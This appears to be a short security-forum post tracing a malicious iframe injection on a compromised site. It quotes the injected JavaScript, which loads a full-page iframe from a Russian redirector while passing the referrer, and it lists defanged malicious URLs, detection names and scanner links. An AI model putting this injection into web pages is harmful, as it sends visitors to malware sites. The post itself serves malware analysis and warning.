See: http://killmalware.com/filmerrai.my3gb.com/#
[cpde]
document.write('<iframe width="100%" height="1000" frameborder="0" framespacing="0" scrolling="auto" src="htxp://bezsvyazi.ru/in.cgi?19&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ñìîòðåòü ôèëüì">');
Redirect site’s malware down? → http://support.clean-mx.de/clean-mx/viruses.php?ip=67.211.195.79&sort=first%20desc
Avast detects as HTML:Iframe-inf.
htxp://bezsvyazi.ru/in.cgi redirects to htxp://hippibook.net/family5/?xid=AkDcrdH3
htxp://hippibook.net/family5/?xid=AkDcrdH3 is in Dr.Web malicious sites list!
See: http://jsunpack.jeek.org/?report=11e6df5d0f5fc80bf2db51e61c4e713c1c2daaf6
Open above link in a browser with NoScript active and inside a VM/sandbox - for security research only.
SyntaxError: XML tag name mismatch (expected link): http://www.nobullcounters.com/stats_detail.php?i=3&report=refer
polonus